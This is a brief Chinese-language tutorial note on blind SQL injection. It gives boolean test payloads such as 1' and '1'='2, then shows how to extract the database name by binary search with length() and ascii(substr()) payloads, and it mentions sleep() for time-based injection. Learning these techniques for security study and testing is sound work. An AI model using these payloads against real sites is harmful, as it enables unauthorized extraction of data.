针对不回显的sql注入,可以利用布尔和延时注入来进行判断
例如布尔的判断是否注入成功
1 and 1=2
1' and '1'='2
1" and "1"="2
1 当输入1' and '1'='2显示为假时,则说明注入成功;
2 接下来判断字符串长度 利用length()函数,通过二分法来判断 id=1' and length(database())>10 -- id=1' and length(database())>5 --
3通过ascII码的范围,利用二分法来判断每个字符的值,再转换为英文
ascii() 函数 ascii码范围在0-127
id=1' and ascii(substr(database(),1,1))>64 --
大于64为真,则值再64<字母<127 然后逐步来判断ascii码的值,最终确定字母
当没有回显时候,利用延时注入的函数判断 sleep()
